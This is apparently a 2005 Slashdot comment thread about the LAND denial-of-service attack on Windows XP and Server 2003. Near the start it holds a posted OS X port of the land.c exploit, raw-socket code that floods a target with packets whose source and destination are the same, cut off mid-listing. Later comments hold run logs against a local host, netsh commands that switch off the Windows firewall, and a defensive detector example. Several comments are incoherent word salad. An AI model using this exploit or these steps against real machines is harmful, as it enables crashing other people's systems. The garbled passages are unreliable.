I am sorry but I don't see how the fact that your windows computer, if you don't have a firewall between it and the world, is vulnerable to attack, is news. It's more like common sense...
In fact, even if you install a firewall on your windows computer, it's still vulnerable to any number of dozens of attacks.
l8,
AC
The machines, both WinXP and Win2k3 Server, did not crash, and the program bounced right back to the command line. These are wide-open machines on a local switch.
Haven't tried the code above, but I spent 5 minutes porting the linked code to OS X. It didn't take long and I am sure someone will compile it and be happy that their favorite OS can crash windows machines just as well as those Linux guys.
Funny story, DOS attacks were my first motivation to try Linux. I wonder how many other people are the same (oh, how the years go by). Anyways, here is the code. And, for the record... it is too hard to post code on Slashdot... A million filters to work through :-(
/* land.c by m3lt, FLC
 * crashes a win95 box
 * This is an OS X port
 * Save the code as land.c / g++ land.c -o land
 */
#include <machine/types.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip_var.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/tcpip.h>

/* TCP pseudo-header used for the TCP checksum */
struct pseudohdr
{
    struct in_addr saddr;
    struct in_addr daddr;
    u_char zero;
    u_char protocol;
    u_short length;
    struct tcphdr tcpheader;
};

/* ones-complement sum over 16-bit words, odd trailing byte included */
u_short checksum(u_short * data,u_short length)
{
    register long value=0;    /* must start at zero; the original left it uninitialised */
    u_short i;
    for(i=0;i<(length>>1);i++)
        value+=data[i];
    if((length&1)==1)
        value+=(data[i]<<8);
    value=(value&65535)+(value>>16);
    return(~value);
}

int main(int argc,char * * argv)
{
    struct sockaddr_in sin;
    struct hostent * hoste;
    int sock;
    char buffer[40];
    struct ip * ipheader=(struct ip *) buffer;
    struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
    struct pseudohdr pseudoheader;

    fprintf(stderr,"land.c by m3lt, FLC\n");
    if(argc<3)
    {
        fprintf(stderr,"usage: %s IP port\n",argv[0]);
        return(-1);
    }
    bzero(&sin,sizeof(struct sockaddr_in));
    sin.sin_family=AF_INET;
    if((hoste=gethostbyname(argv[1]))!=NULL)
        bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
    else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
    {
        fprintf(stderr,"unknown host %s\n",argv[1]);
        return(-1);
    }
    if((sin.sin_port=htons(atoi(argv[2])))==0)
    {
        fprintf(stderr,"unknown port %s\n",argv[2]);
        return(-1);
    }
    if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
    {
        fprintf(stderr,"couldn't allocate raw socket\n");
        return(-1);
    }
    bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
    ipheader->ip_v=4;
    ipheader->ip_hl=sizeof(struct ip)/4;
    ipheader->ip_len=htons(sizeof(struct ip)+sizeof(struct tcphdr));
    ipheader->ip_id=htons(0xF1C);
    ipheader->ip_ttl=255;
    ipheader->ip_p=IPPROTO_TCP;
    ipheader->ip_src=(const in_addr &)sin.sin_addr.s_addr;
    ipheader->ip_dst=(const in_addr &)sin.sin_addr.s_addr;
    tcpheader->th_sport=sin.sin_port;
    tcpheader->th_dport=sin.sin_port;
    tcpheader->th_seq=htonl(0xF1C);
    tcpheader->th_flags=TH_SYN;
    tcpheader->th_off=sizeof(struct tcphdr)/4;
    tcpheader->th_win=htons(2048);
    bzero(&pseudoheader,12+sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.protocol=6;
    pseudoheader.length=htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
    tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
    if(sendto(sock,buffer,
...before some jerkoff exploits this totally avoidable vulnerability inside the payload of a virus or trojan horse? Imagine that: Some dumb corporate cluck innocently clicks on an email attachment, and ten seconds later every other PC on the corporate LAN's subnet suddenly goes apoplectic, and they all stay that way until the infected machine is detected and shut down. We all know something like this will eventually happen, now that the LAND cat is out of the bag (again).
It gets worse: Suppose some nefarious bastard wanted to commit a crime and have plenty of getaway time. All he'd have to do is find a way to get a few key law enforcement machines trojaned, confirm their infections (with outbound pings or something), and then just time the LAND attack to correspond with the timing of the crime.
Gosh, it's so exciting to live in a world with a huge, homogeneous population of highly-vulnerable mission-critical platforms!
About the word "if": If bullfrogs had wings, they wouldn't bounce around on their little green butts.
I think this is exactly what grand-parent was referring to!
I hate to break it to you, but C code is a valid form of communication at slashdot.
:)
It's not our problem if you are C illiterate.
Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received,
so I decided to share this info with security community.
Ethics?
When Microsoft didn't respond, you decided to tell the rest of the world that you can DoS some WinXP or 2003 Machine with ease? How is that ethical?
It can be analogous to someone saying "Hey, if you cut the red wire in [insert security system here] you can disable it and the cops won't come. [Insert security company] was informed and didn't respond in 7 days, so I decided to tell the rest of the world."
2 if by SEA
and screamed her fingers off.
I have a system with Windows XP and SP2, and a hardware firewall. I am a complete newbie to compiling anything, so my question is, how do I compile this .c file? I tried Bloodshed Dev-C++ and GCC, but Bloodshed can't find the required .h files and gcc says: "`IP_TCP' undeclared (first use in this function)".
Can anyone help me?
Perhaps more than a little bit dated.
Yorktown was decommissioned in December 2004. The Yorktown was on active service in the Persian Gulf as late as the summer of '04. CG 48 Yorktown
The Ronald Reagan, ninth (and last) of the Nimitz class carriers, uses W2K based smart ship components developed by Microsoft Federal Systems.
If the LAND Attack is that notorious, you should be able to find a better description of it than a bit of badly-documented C code.
do that ??
W2K SP4 and WXP SP1 seem to be unaffected by this attack...
Windows NT 4: Ports 135, 139, and typically one other port in the 1020s range. No 445 here. :)
Windows 95: Just port 139. Nothing else.
Windows 3.x: NO ports open.
Ding ding ding! It looks like Windows 3.x is our winner! Guess we haven't really gone so far since the early 90s after all.
My best Ping of Death fun against a firewall machine is to get the user to visit my Ping of Death web server, i.e. the ping returns on the client's call. If your NAT is not filtering against bad TCP/IP, it is bye-bye Windows machine.
Yep, Ping of Death requires an open port too; this was not a problem if the user creates it for me.
(I do this with friends to find out if our firewalls live against some of these tricks.)
People learn very quickly to have their Windows machine behind something that cleans traffic.
A house is a study of animal's structure.
Cosmology is the long bone in the jungle.
Yes you are! You are the moments that you cannot work where your work is likely to overlap with the community.
He must have produced something valuable, but i don't know and maybe that's a problem. A house is a study of the opening of the solar system. It basically says that every system on the wrong side of the solar system. And it has nothing to do this mainly because their engineers got a call to finx one of r0cketgrls little thralls?
You really are the fleshy edges of the things microsoft wants to do with the calf of the internet" that says that you cannot work where your work is likely to overlap with the community.
Two if by C++
BTW, is this really news? Last time I checked, there were tons of ways to wtfpwn *any* OS which wasn't protected by a firewall.
That pain in your back is from reaching too hard...
I tried this against my girlfriend's computer with a wireless network connection. She has XP home SP2. With the firewall ON it caused 100% CPU usage during the attack, and loss of connection. Connection was restored after sending ^C to hping2. With the firewall OFF it caused 100% CPU usage during the attack, and loss of connection. CPU usage and connection were not restored for about a minute after the end of the attack. The included firewall with default settings is NOT a solution to this problem on XP Home SP2.
Case number three's function call getting an input from a user should probably apply something along the lines of case number one. In both of the prior cases, they actually DO something to actively avoid a division by zero; in three, you do NOTHING, but you could have, either in the function or just before the division... i.e.
c = b / ((a == 0) ? 1 : a);   /* parentheses needed: without them the division happens before the ?: test */
or something similar.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Didn't SP2 make it impossible in Windows for an application to fill in an invalid source IP address? If this is the case, I wonder if this problem cropped up because Microsoft cannot generate the LAND attack with an up to date version of their OS.
Also, I wonder what sort of vulnerabilities exist in Windows for IPv6?
-Aaron
This post is encrypted twice with ROT-13. Documenting or attempting to crack this encryption is illegal.
... backwards-compatibility.
Let's see OSS match this! A bug, almost a decade old, STILL SUPPORTED!
You can quickly disable the firewall from the command line via a netsh command.
Disable:
netsh firewall set opmode disable
Enable:
netsh firewall set opmode enable
http://www.ohiopike.com/NotMp3's/Ohio%20Posse%20-%20Melt's%20a%20haqor%20-%20you%20landed%20my%20box.mp3
Close, but no cigar. Whether the host is routable or not has no bearing on the attack -- it need only have the same source and destination.
Your rules will do you no good if the attacker chooses a nice routable address like, say, 66.94.230.36 or 66.35.250.151.
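The two points made about this condition in the thread (that NAT breaks the attack because it rewrites only the destination address, and that whether the source address is routable has no bearing on it) can be checked against actual header bytes. The following is an added example, written for this page and not code from either commenter or from land.c: a defender-side classifier that walks a raw IPv4/TCP datagram and flags the LAND shape (source address equal to destination, source port equal to destination port, SYN set), plus a small model of a destination-NAT rewrite. The function names, the `IP4` macro, and the constructed packets are my assumptions; 203.0.113.5 is a documentation-range address standing in for a "nice routable" one, and checksums are left at zero because the check does not depend on them.

```c
/* Added example (not code from the thread): a defender-side check for the
 * LAND condition on raw IPv4/TCP bytes, plus a model of the destination-NAT
 * rewrite that the comments above credit with breaking the attack. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define TCP_FLAG_SYN 0x02
/* Assemble a dotted quad into a host-order 32-bit value (assumed helper). */
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                         ((uint32_t)(c) << 8) | (uint32_t)(d))

/* Network byte order is big-endian; read/write fields byte by byte rather
 * than trusting struct layout or host endianness. */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}
static void wr16(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)(v & 0xff);
}
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)((v >> 16) & 0xff);
    p[2] = (uint8_t)((v >> 8) & 0xff); p[3] = (uint8_t)(v & 0xff);
}

/* Return 1 if pkt is a LAND-shaped datagram: IPv4, TCP, source address equal
 * to destination address, source port equal to destination port, SYN set.
 * Anything else (other protocol, truncated header, ordinary SYN) returns 0.
 * Whether the address is routable plays no part in the decision. */
int is_land_packet(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return 0;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 20 || pkt[9] != 6)
        return 0;
    const uint8_t *tcp = pkt + ihl;
    return rd32(pkt + 12) == rd32(pkt + 16) &&
           rd16(tcp) == rd16(tcp + 2) &&
           (tcp[13] & TCP_FLAG_SYN) != 0;
}

/* Model of destination NAT: only the destination address is rewritten to the
 * inside host; the source is left alone, so src == dst no longer holds.
 * The IP header checksum is deliberately not recomputed because the detector
 * above does not inspect it. Returns 1 on success, 0 if the buffer is short. */
int nat_rewrite_dst(uint8_t *pkt, size_t len, uint32_t inside_addr)
{
    if (len < 20)
        return 0;
    wr32(pkt + 16, inside_addr);
    return 1;
}

/* Build a constructed 40-byte IPv4 + TCP SYN (no options, zero checksums)
 * into out; returns the number of bytes written. */
size_t build_syn(uint8_t *out, uint32_t src, uint32_t dst,
                 uint16_t sport, uint16_t dport)
{
    memset(out, 0, 40);
    out[0] = 0x45;              /* version 4, IHL 5 words */
    wr16(out + 2, 40);          /* total length */
    out[8] = 255;               /* TTL */
    out[9] = 6;                 /* protocol TCP */
    wr32(out + 12, src);
    wr32(out + 16, dst);
    wr16(out + 20, sport);
    wr16(out + 22, dport);
    out[32] = 0x50;             /* data offset 5 words */
    out[33] = TCP_FLAG_SYN;
    return 40;
}

int main(void)
{
    uint8_t pkt[40];
    size_t n = build_syn(pkt, IP4(203, 0, 113, 5), IP4(203, 0, 113, 5), 3389, 3389);
    printf("routable src==dst SYN:      %d\n", is_land_packet(pkt, n));   /* 1 */
    nat_rewrite_dst(pkt, n, IP4(10, 1, 1, 2));
    printf("after destination NAT:      %d\n", is_land_packet(pkt, n));   /* 0 */
    build_syn(pkt, IP4(10, 1, 1, 2), IP4(10, 1, 1, 2), 3389, 80);
    printf("same host, different ports: %d\n", is_land_packet(pkt, n));   /* 0 */
    return 0;
}
```

The first case shows the routability point: a packet with a public-looking source still matches because the check compares the two address fields against each other, not against any list. The second shows the NAT point: once destination NAT has rewritten only the destination, the two addresses differ and the same bytes no longer match, which is exactly why a host behind NAT is not reachable with a packet that satisfies the LAND condition at the host. A filter on the perimeter needs no more than the `src == dst` test to drop these, regardless of which address is chosen.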
Well, after picking through the code, compiling, nmap'ing, and landing, I'm yet to notice what the hell it's supposed to do to WinXP... No firewall enabled, and ran it on an open port, and nothing happens...
./land 10.1.1.2 3389
:\
# nmap 10.1.1.2
Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) at 2005-03-08 17:26 EST
Interesting ports on 10.1.1.2:
(The 1654 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
Nmap run completed -- 1 IP address (1 host up) scanned in 2.610 seconds
#
land.c by m3lt, FLC
10.1.1.2:3389 landed
#
Wow. This must be one huge hole
Sendmail is like emacs: A nice operating system, but missing an editor and a MTA.
Above injects twenty such packets at intervals of 1 sec (can change interval by -w) - enough to keep the target at 100% for some time. Here's the good people at SourceForge:
http://packit.sourceforge.net/
I'll be able to make my case for doing all my work on a cruise ship.
Know your pads. One time pad: good for cryptography. Two timing pad: where to take your mistress.